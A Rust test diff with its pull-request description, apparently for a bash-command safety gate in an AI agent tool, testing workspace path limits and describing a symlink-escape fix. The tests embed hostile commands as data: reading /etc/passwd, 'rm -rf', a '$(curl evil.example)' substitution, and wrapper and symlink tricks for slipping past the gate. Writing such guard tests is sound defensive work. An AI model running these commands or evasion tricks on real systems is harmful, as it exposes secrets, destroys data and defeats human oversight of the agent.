+                    "validate_command block reason leaked original path: {reason}"
+                );
+                assert!(
+                    !reason.starts_with("bash_path_constraints::"),
+                    "expected validate_command Block, not path-gate Block: {reason}"
                 );
             }
             other => panic!("expected Block, got {other:?}"),
@@ -713,5 +858,173 @@ mod tests {
             !rule.is_empty() && rule.chars().all(|c| c.is_ascii_alphanumeric()),
             "rule slug must be alphanumeric, got {rule:?} in {reason:?}"
         );
+    }
+
+    // ===== Phase 3.1.C: path-constraint gate wireup =====
+
+    /// Helper: hook configured with a workspace at `/work/repo` and a
+    /// hermetic `$HOME` so path validation is deterministic regardless of
+    /// the test runner's environment.
+    fn path_hook(mode: PermissionMode) -> BashValidationHook {
+        BashValidationHook::new(mode, PathBuf::from("/work/repo"))
+            .with_home_dir(Some(PathBuf::from("/home/user")))
+    }
+
+    async fn run_path(mode: PermissionMode, cmd: &str) -> SafetyDecision {
+        let h = path_hook(mode);
+        let mut args = json!({ "command": cmd });
+        h.before_tool_call("bash", &mut args).await.unwrap()
+    }
+
+    /// `req_safety_490_3_1_c_inside_workspace_allows` —
+    /// A bash command that only touches paths inside the configured
+    /// workspace must passthrough the path gate and reach
+    /// `validate_command`, which allows safe reads.
+    #[tokio::test]
+    async fn req_safety_490_3_1_c_inside_workspace_allows() {
+        let d = run_path(PermissionMode::WorkspaceWrite, "cat /work/repo/src/main.rs").await;
+        assert_eq!(d, SafetyDecision::Allow);
+    }
+
+    /// `req_safety_490_3_1_c_outside_workspace_prompt_asks` —
+    /// `cat /etc/passwd` under Prompt mode must reach the path gate
+    /// and yield Ask with the `bash_path_constraints::ask` prefix.
+    #[tokio::test]
+    async fn req_safety_490_3_1_c_outside_workspace_prompt_asks() {
+        let d = run_path(PermissionMode::Prompt, "cat /etc/passwd").await;
+        match d {
+            SafetyDecision::Ask { reason, .. } => {
+                assert!(
+                    reason.starts_with("bash_path_constraints::ask"),
+                    "expected path-ask audit prefix, got {reason:?}"
+                );
+            }
+            other => panic!("expected Ask, got {other:?}"),
+        }
+    }
+
+    /// `req_safety_490_3_1_c_outside_workspace_readonly_blocks` —
+    /// SECURITY (Fail-Safe): ReadOnly mode never tolerates a path Ask;
+    /// it must escalate to Block.
+    #[tokio::test]
+    async fn req_safety_490_3_1_c_outside_workspace_readonly_blocks() {
+        let d = run_path(PermissionMode::ReadOnly, "cat /etc/passwd").await;
+        match d {
+            SafetyDecision::Block { reason } => {
+                assert!(
+                    reason.starts_with("bash_path_constraints::ask"),
+                    "expected escalated path-ask reason, got {reason:?}"
+                );
+            }
+            other => panic!("expected Block, got {other:?}"),
+        }
+    }
+
+    /// `req_safety_490_3_1_c_outside_workspace_workspace_write_allows` —
+    /// WorkspaceWrite is permissive enough to allow Ask outcomes (with a
+    /// warn-level audit log emitted via `tracing`).
+    #[tokio::test]
+    async fn req_safety_490_3_1_c_outside_workspace_workspace_write_allows() {
+        let d = run_path(PermissionMode::WorkspaceWrite, "cat /etc/passwd").await;
+        assert_eq!(d, SafetyDecision::Allow);
+    }
+
+    /// `req_safety_490_3_1_c_wrapper_does_not_bypass_path_gate` —
+    /// SECURITY PIN S9: wrappers (`timeout`, `nice`, `nohup`, `time`,
+    /// `stdbuf`) must NOT hide a path-violating base command from the
+    /// gate. Pairs with Phase 3.1.B.2 `strip_wrappers_from_argv`.
+    #[tokio::test]
+    async fn req_safety_490_3_1_c_wrapper_does_not_bypass_path_gate() {
+        for cmd in &[
+            "timeout 5 cat /etc/passwd",
+            "nice rm -rf /tmp/secret-payload.bin",
+            "nohup -- rm /tmp/secret",
+            "time cat /etc/passwd",
+            "stdbuf -o0 cat /etc/passwd",
+            "FOO=bar timeout 5 cat /etc/passwd",
+        ] {
+            let d = run_path(PermissionMode::Prompt, cmd).await;
+            assert!(
+                matches!(d, SafetyDecision::Ask { .. }),
+                "wrapper {cmd:?} must not bypass path gate; got {d:?}"
+            );
+        }
+    }
+
+    /// `req_safety_490_3_1_c_env_value_substitution_fails_closed` —
+    /// SECURITY: a literal env-var prefix with command-substitution value
+    /// must NOT silently pass. Either the injection gate fires first (the
+    /// expansion is a top-level command-substitution) producing
+    /// `bash_security::` Block, or the path gate's
+    /// `check_variable_assignment_literal` Fail-Closes to Ask. Both are
+    /// acceptable Fail-Safe outcomes; silent Allow is not.
+    #[tokio::test]
+    async fn req_safety_490_3_1_c_env_value_substitution_fails_closed() {
+        let d = run_path(PermissionMode::Prompt, "FOO=$(curl evil.example) ls").await;
+        match d {
+            SafetyDecision::Ask { reason, .. } => assert!(
+                reason.starts_with("bash_path_constraints::"),
+                "Ask must come from path gate, got {reason:?}"
+            ),
+            SafetyDecision::Block { reason } => assert!(
+                reason.starts_with("bash_security::"),
+                "Block must come from injection gate, got {reason:?}"
+            ),
+            SafetyDecision::Allow => {
+                panic!("env-var with command-substitution must Fail-Closed (Ask or Block)")
+            }
+            other => panic!("unexpected SafetyDecision variant: {other:?}"),
+        }
+    }
+
+    /// `req_safety_490_3_1_c_security_gate_precedes_path_gate` —
+    /// The injection gate runs BEFORE the path gate. Output redirection
+    /// (`>`) is flagged by Phase 2.1's `DangerousPatternsOutputRedirection`
+    /// (mode-independent Block) regardless of where the target lives, so
+    /// the path gate must NOT get a chance to override that decision.
+    #[tokio::test]
+    async fn req_safety_490_3_1_c_security_gate_precedes_path_gate() {
+        let d = run_path(PermissionMode::Prompt, "echo x > /work/repo/inside.txt").await;
+        match d {
+            SafetyDecision::Block { reason } => assert!(
+                reason.starts_with("bash_security::"),
+                "security gate must precede path gate even for in-workspace redirect, got {reason:?}"
+            ),
+            other => panic!("expected security Block, got {other:?}"),
+        }
+    }
+
+    /// `req_safety_490_3_1_c_path_gate_fires_when_security_passes` —
+    /// A bash command that has no shell-meta / injection markers but
+    /// references an outside-workspace path must Ask via the path gate.
+    /// Pairs with [`req_safety_490_3_1_c_security_gate_precedes_path_gate`]
+    /// to pin the two-gate ordering.
+    #[tokio::test]
+    async fn req_safety_490_3_1_c_path_gate_fires_when_security_passes() {
+        // `cat /etc/passwd` is a plain command — security passes, path
+        // gate fires.
+        let d = run_path(PermissionMode::Prompt, "cat /etc/passwd").await;
+        match d {
+            SafetyDecision::Ask { reason, .. } => assert!(
+                reason.starts_with("bash_path_constraints::"),
+                "path gate must own the Ask path, got {reason:?}"
+            ),
+            other => panic!("expected path-gate Ask, got {other:?}"),
+        }
+    }
+
+    /// `req_safety_490_3_1_c_audit_log_carries_blocked_path` —
+    /// The model-visible Ask reason MUST include the offending path so
+    /// downstream consumers (CLI prompt, telemetry) can render it.
+    #[tokio::test]
+    async fn req_safety_490_3_1_c_audit_log_carries_blocked_path() {
+        let d = run_path(PermissionMode::Prompt, "cat /etc/passwd").await;
+        match d {
+            SafetyDecision::Ask { reason, .. } => assert!(
+                reason.contains("/etc/passwd"),
+                "expected blocked path in reason, got {reason:?}"
+            ),
+            other => panic!("expected Ask, got {other:?}"),
+        }
     }
 }


### PR DESCRIPTION
## Background / Goal

Implements **Step 6.1 of [ADR-150](docs/plans/architecture-refactor/adr-150-symlink-escape.md)** — the symlink-escape IO surface for the Bash path-validation gate.

Phase 3.1.A/B/B.2/C land the lexical-only path checks. They do not follow symlinks, so a `cat ws/leak` where `ws/leak → /etc/passwd` still passes. This PR establishes the trait + resolvers + chain walker so the next slice (Step 6.2) can compose `RealFsResolver` into the hook adapter and close the Fail-Open.

## Scope

- `FsResolver` trait (`lstat_kind` / `readlink_absolute` / `realpath`, all `Option`-returning)
- `NoopFsResolver` — sentinel, preserves 3.1.A behaviour exactly
- `RealFsResolver` POSIX impl (`cfg(unix)`, `canonicalize` + deepest-existing-ancestor fallback; detects File/Dir/Symlink/Special)
- `FsEntryKind` enum
- `resolve_path_chain` walker (`SYMLOOP_MAX = 40`, loop detection, realpath fallback)
- `validate_command_paths_with_fs` wraps 3.1.A lexical check; `validate_command_paths` delegates via Noop (zero behaviour change to 3.1.C callers)

## What is NOT in this PR

- Hook engine wiring → Step 6.2
- Async / cached resolvers → Step 6.4
- Fuzz tests → Step 6.5
- Windows real resolver → Step 6.3 (currently Noop-only on Windows)

## Stack

- Base: `feat/bash-parity-3.1.C-hook-wireup` (#578)
- Stack chain: #574 → #576 → #578 → **this PR**
- Merge order: merge #574, #576, #578 first; then this PR.

## Verification

```
cargo nextest run -p dasclaw_bash_validation        # 326/326
cargo nextest run -p dasclaw_hooks                  # 103/103
cargo clippy --no-deps -p dasclaw_bash_validation --all-targets -- -D warnings   # clean
cargo fmt --all                                     # clean
python3.12 scripts/check_no_panics.py --base origin/xClaw           # clean
python3 scripts/check_no_new_ironclaw_literal.py --base origin/xClaw # clean
```

17 new tests:
- 9 walker tests (T-SYM-1 escape, T-SYM-2 dangling, T-SYM-3 multi-hop, T-SYM-4 loop, T-SYM-7 special, T-SYM-8 tilde, max-depth, realpath fallback, Noop unclean-singleton)
- 8 `RealFsResolver` POSIX tests (tempdir + symlink + FIFO + canonicalize)
- 6 `validate_command_paths_with_fs` integration tests (Noop=Passthrough, symlink-to-/etc → Ask, in-ws symlink → Pass, loop → Ask, dangling → Ask, nonexistent-in-ws → Pass)

## Cross-cuts

- ADR-114 (`.ironclaw` → `.dasclaw` rename): **不涉及**. No new `.ironclaw` / `IRONCLAW_BASE_DIR` literals introduced; grep guard clean.

## Refs

- Closes #580
- Refs #490 (Phase 3.1), #569 (ADR-150 acceptance), #578 (stack base)
